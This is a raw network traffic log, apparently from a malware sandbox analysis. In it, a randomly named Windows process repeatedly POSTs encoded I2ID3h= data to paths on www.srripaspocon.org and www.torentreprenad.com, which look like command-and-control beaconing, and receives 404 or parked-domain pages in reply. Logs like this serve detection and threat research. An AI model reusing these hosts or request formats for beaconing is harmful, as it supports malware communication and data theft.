I2ID3h=DqO7igyO8zuopn8TQnlRBGQxy7e2xQTIdtjtyHw/9YFrXx6ZqJrqOgrpp1tPN5NT50/MUpfq6/P9nmSVIMqDlBvM1v5o/tr4RzqVnsWjX0KGwI2daXIde4JQZNMAyx8l+/VGw4uBX3D1xc11Ajmg288A3dvN9mIqCggGnAjmudUPDXXuhFExONZxhmXO0JHZi7/BCm0=
May 30, 2024 15:03:42.312052011 CEST	1236	IN	HTTP/1.1 404 Not Found Connection: close Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0 Pragma: no-cache Content-Type: text/html Content-Length: 1236 Date: Thu, 30 May 2024 13:03:42 GMT Server: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;" hr
May 30, 2024 15:03:42.312076092 CEST	238	IN	Data Raw: 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 69 74 65 73 70 65 65 64 74 65 63 68 2e 63 6f 6d 2f 65 72 72 6f 72 2d 70 61 67 65 22 3e 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 2f 61 3e 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 Data Ascii: ef="http://www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.5	49742	15.204.0.108	80	6428	C:\Program Files (x86)\gBJTaDntZgEdtxjRNefvmnBFXiYgDKOPRytPNXvq\ISsofSsdrAsp.exe

Timestamp	Bytes transferred	Direction	Data
May 30, 2024 15:03:44.240921974 CEST	726	OUT	POST /egr4/ HTTP/1.1 Host: www.srripaspocon.org Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 227 Origin: http://www.srripaspocon.org Referer: http://www.srripaspocon.org/egr4/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko Data Raw: 49 32 49 44 33 68 3d 44 71 4f 37 69 67 79 4f 38 7a 75 6f 37 55 6b 54 57 77 4a 52 51 57 51 32 78 37 65 32 36 77 54 4d 64 74 2f 74 79 47 30 56 6f 37 74 72 58 55 57 5a 6b 6f 72 71 4e 67 72 70 6d 56 74 4b 56 5a 4e 61 35 30 79 73 55 70 7a 71 36 2f 62 39 6e 6b 4b 56 49 66 53 45 33 68 76 53 39 50 35 6d 78 4e 72 34 52 7a 71 56 6e 6f 33 30 58 77 75 47 77 37 75 64 56 54 55 61 41 6f 4a 54 50 39 4d 41 32 78 38 70 2b 2f 56 67 77 36 62 6d 58 31 37 31 78 5a 52 31 4f 53 6d 6a 6a 4d 38 61 7a 64 75 78 35 45 45 6d 46 69 31 4b 69 51 54 68 34 4c 45 6f 50 42 36 45 37 6e 4d 5a 64 74 31 4a 78 31 66 35 6c 35 6d 77 34 59 76 78 63 78 67 58 61 61 39 49 2b 7a 6b 46 6d 59 4f 68 56 66 71 4a 4f 65 7a 56 Data Ascii: I2ID3h=DqO7igyO8zuo7UkTWwJRQWQ2x7e26wTMdt/tyG0Vo7trXUWZkorqNgrpmVtKVZNa50ysUpzq6/b9nkKVIfSE3hvS9P5mxNr4RzqVno30XwuGw7udVTUaAoJTP9MA2x8p+/Vgw6bmX171xZR1OSmjjM8azdux5EEmFi1KiQTh4LEoPB6E7nMZdt1Jx1f5l5mw4YvxcxgXaa9I+zkFmYOhVfqJOezV
May 30, 2024 15:03:44.838265896 CEST	1236	IN	HTTP/1.1 404 Not Found Connection: close Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0 Pragma: no-cache Content-Type: text/html Content-Length: 1236 Date: Thu, 30 May 2024 13:03:44 GMT Server: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;" hr
May 30, 2024 15:03:44.838293076 CEST	238	IN	Data Raw: 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 69 74 65 73 70 65 65 64 74 65 63 68 2e 63 6f 6d 2f 65 72 72 6f 72 2d 70 61 67 65 22 3e 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 2f 61 3e 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 Data Ascii: ef="http://www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.5	49743	15.204.0.108	80	6428	C:\Program Files (x86)\gBJTaDntZgEdtxjRNefvmnBFXiYgDKOPRytPNXvq\ISsofSsdrAsp.exe

Timestamp	Bytes transferred	Direction	Data
May 30, 2024 15:03:46.782613039 CEST	1743	OUT	POST /egr4/ HTTP/1.1 Host: www.srripaspocon.org Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 1243 Origin: http://www.srripaspocon.org Referer: http://www.srripaspocon.org/egr4/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko Data Raw: 49 32 49 44 33 68 3d 44 71 4f 37 69 67 79 4f 38 7a 75 6f 37 55 6b 54 57 77 4a 52 51 57 51 32 78 37 65 32 36 77 54 4d 64 74 2f 74 79 47 30 56 6f 39 31 72 55 69 43 5a 72 72 7a 71 4d 67 72 70 34 6c 74 4c 56 5a 4d 61 35 30 61 7a 55 70 50 36 36 39 6a 39 31 56 71 56 5a 65 53 45 39 68 76 53 78 76 35 6e 2f 74 71 69 52 79 61 52 6e 73 54 30 58 77 75 47 77 39 71 64 53 48 49 61 43 6f 4a 51 5a 4e 4d 48 79 78 39 38 2b 2f 4e 65 77 36 66 63 55 45 62 31 30 4a 42 31 4d 67 65 6a 68 73 38 45 30 64 75 70 35 45 4a 34 46 69 34 37 69 51 57 30 34 4d 6f 6f 4e 32 62 4f 76 6d 51 41 4d 65 56 53 77 57 66 39 34 38 33 53 68 62 36 4c 42 51 4a 78 66 37 73 6c 35 6b 35 42 6b 34 58 71 44 4c 75 52 63 34 6d 35 62 56 42 71 6c 45 59 6b 55 6c 61 73 5a 4b 7a 64 51 7a 4e 32 42 6a 39 52 4e 78 39 5a 67 41 79 58 62 2f 5a 45 56 36 2f 6f 57 43 4a 31 70 31 5a 6c 47 37 61 77 7a 76 76 57 6b 36 53 6d 36 73 2b 65 4d 52 2b 45 51 76 72 54 56 76 6f 64 4b 49 72 73 49 34 2b 46 61 34 72 63 51 4d 56 52 6b 6a 51 71 68 74 48 34 4b 64 35 2b 36 72 7a 55 31 42 35 [TRUNCATED] Data Ascii: I2ID3h=DqO7igyO8zuo7UkTWwJRQWQ2x7e26wTMdt/tyG0Vo91rUiCZrrzqMgrp4ltLVZMa50azUpP669j91VqVZeSE9hvSxv5n/tqiRyaRnsT0XwuGw9qdSHIaCoJQZNMHyx98+/New6fcUEb10JB1Mgejhs8E0dup5EJ4Fi47iQW04MooN2bOvmQAMeVSwWf9483Shb6LBQJxf7sl5k5Bk4XqDLuRc4m5bVBqlEYkUlasZKzdQzN2Bj9RNx9ZgAyXb/ZEV6/oWCJ1p1ZlG7awzvvWk6Sm6s+eMR+EQvrTVvodKIrsI4+Fa4rcQMVRkjQqhtH4Kd5+6rzU1B5qUZpBeuzhWeS09lgsmZtvvjg/X/x03d+nSRzPAlkrv4kbsCrhTlXxsM5gc7pfQ1wMe1vt8gy1I2UZ1vk1JeW4zFFRnZIZ+rBQm27qZo1enxMydhQWR9xz3ZqLeplvJrWwTXbW6NV0HQxzNvF3Pn0McrDrK2Fq3DHxNYBxVrvrxeXQ++BzLoX37w7JtQ4Zt4SgBTYsfCwPqz1QjsFEDQQm7zVBMm5tdoSX0Guk37y3mrABx8D+2MJ0FLpOjPunPh4mGYarhTpqEuEnnaqBhcqlPez3ckzllZcBdg0WCxzaBFXcesP+OlXd1PMJVhDA1gdRslnMAbYqQV4LlfIrdL0CkHXNTgqeLuooy/AORsYrMo67i1OUoyIy6ZOFnxGG0hUkIEfMOoxx8yj65KTBCQIamfgcr/+Zhc1W9TmQ8IUXCpVySo4089FiXC+MONAM6bS8sgjmkn26bsOv6BXGIYu6kro1EyxpAsXtzTEOhfsdlaR2slUVAZqpan/S0ySGDdxUAoBN5NU6cW8V9Rt8O8bEkTUsuxX38PHYsdqiwL+rHNsVZECDGvdIlYA0CiF8qFHWyIAwXftnqmz5+DtVoKdL16dWJ65KKshb3tTE7N4qPMe5ckFcUXRroXI0qV8JwsVpGBxfM/qrV5RgVR4aH915DMOaS9uVUvO+L [TRUNCATED]
May 30, 2024 15:03:47.403340101 CEST	1236	IN	HTTP/1.1 404 Not Found Connection: close Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0 Pragma: no-cache Content-Type: text/html Content-Length: 1236 Date: Thu, 30 May 2024 13:03:47 GMT Server: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;" hr
May 30, 2024 15:03:47.403354883 CEST	238	IN	Data Raw: 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 69 74 65 73 70 65 65 64 74 65 63 68 2e 63 6f 6d 2f 65 72 72 6f 72 2d 70 61 67 65 22 3e 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 2f 61 3e 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 Data Ascii: ef="http://www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.5	49744	15.204.0.108	80	6428	C:\Program Files (x86)\gBJTaDntZgEdtxjRNefvmnBFXiYgDKOPRytPNXvq\ISsofSsdrAsp.exe

Timestamp	Bytes transferred	Direction	Data
May 30, 2024 15:03:49.320168018 CEST	442	OUT	GET /egr4/?I2ID3h=OombhWzhkCuNqFAQBgJWCTIe5Ku7zRL7Rc3Pxm83mLxAAziOmqPFMSLkiV9xX+4t83HRZJys59Cvhm/US+qCyQrh5sl2ntzzWgXRuNaMR0672puaeGZqUZ0nGfY4wTYgtA==&aN6=3TWTWTzxVTU HTTP/1.1 Host: www.srripaspocon.org Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
May 30, 2024 15:03:49.988275051 CEST	1236	IN	HTTP/1.1 404 Not Found Connection: close Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0 Pragma: no-cache Content-Type: text/html Content-Length: 1236 Date: Thu, 30 May 2024 13:03:49 GMT Server: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;" hr
May 30, 2024 15:03:49.988296032 CEST	238	IN	Data Raw: 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 69 74 65 73 70 65 65 64 74 65 63 68 2e 63 6f 6d 2f 65 72 72 6f 72 2d 70 61 67 65 22 3e 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 2f 61 3e 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 Data Ascii: ef="http://www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.5	49745	194.9.94.86	80	6428	C:\Program Files (x86)\gBJTaDntZgEdtxjRNefvmnBFXiYgDKOPRytPNXvq\ISsofSsdrAsp.exe

Timestamp	Bytes transferred	Direction	Data
May 30, 2024 15:04:05.262156010 CEST	712	OUT	POST /r45o/ HTTP/1.1 Host: www.torentreprenad.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 207 Origin: http://www.torentreprenad.com Referer: http://www.torentreprenad.com/r45o/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko Data Raw: 49 32 49 44 33 68 3d 74 78 47 5a 57 68 2f 6f 2f 35 38 36 38 69 48 52 36 66 39 50 6c 70 65 6d 57 6a 6d 4a 5a 4f 64 35 50 71 59 53 63 31 35 6d 36 6f 31 55 72 63 50 50 6f 65 31 38 6d 71 76 73 41 41 47 6d 6b 69 2f 79 41 69 76 6c 39 48 58 53 6d 50 76 41 46 6c 50 5a 52 38 38 79 73 33 66 59 41 36 44 79 41 4f 6a 53 34 6e 56 66 68 6a 57 65 63 52 6c 4e 58 2f 32 48 39 59 49 35 59 63 74 32 67 72 6d 75 2b 69 34 6c 37 38 6d 2b 54 37 35 4c 78 45 6d 59 62 74 41 73 35 66 33 4a 36 57 6c 6a 73 38 72 42 58 4f 2b 46 77 51 6a 6b 62 52 58 4a 4f 30 42 71 45 35 66 30 78 58 32 44 62 35 68 69 37 54 53 38 58 71 33 79 36 33 2b 34 53 30 41 3d Data Ascii: I2ID3h=txGZWh/o/5868iHR6f9PlpemWjmJZOd5PqYSc15m6o1UrcPPoe18mqvsAAGmki/yAivl9HXSmPvAFlPZR88ys3fYA6DyAOjS4nVfhjWecRlNX/2H9YI5Yct2grmu+i4l78m+T75LxEmYbtAs5f3J6Wljs8rBXO+FwQjkbRXJO0BqE5f0xX2Db5hi7TS8Xq3y63+4S0A=
May 30, 2024 15:04:05.937280893 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 30 May 2024 13:04:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.1.24 Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED] Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]\|\|[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
May 30, 2024 15:04:05.937374115 CEST	224	IN	Data Raw: 65 2f 72 65 73 70 6f 6e 73 69 76 65 2f 69 6d 61 67 65 73 2f 69 4f 53 2d 37 32 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20 Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.
May 30, 2024 15:04:05.937407970 CEST	1236	IN	Data Raw: 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 20 3d 20 31 2e 30 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 Data Ascii: 0, maximum-scale = 1.0, width=device-width" /> <link rel="stylesheet" type="text/css" href="https://static.loopia.se/responsive/styles/reset.css" /> <link rel="stylesheet" type="text/css" href="https://static.loopia.se/shared/style/
May 30, 2024 15:04:05.937460899 CEST	1236	IN	Data Raw: 67 69 6e 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6c 6f 6f 70 69 61 2e 63 6f 6d 2f 6c 6f 67 69 6e 3f 75 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61 Data Ascii: gin to <a href="https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=login">Loopia Customer zone</a> and actualize your plan.</p> <div class="divider"></div>
May 30, 2024 15:04:05.937494993 CEST	448	IN	Data Raw: 53 2c 20 79 6f 75 20 77 69 6c 6c 20 62 65 20 61 62 6c 65 20 74 6f 20 6d 61 6e 61 67 65 20 79 6f 75 72 20 64 6f 6d 61 69 6e 73 20 69 6e 20 6f 6e 65 20 73 69 6e 67 6c 65 20 70 6c 61 63 65 20 69 6e 20 4c 6f 6f 70 69 61 20 43 75 73 74 6f 6d 65 72 20 Data Ascii: S, you will be able to manage your domains in one single place in Loopia Customer zone. <a href="https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=dns">Read more at loopia.co
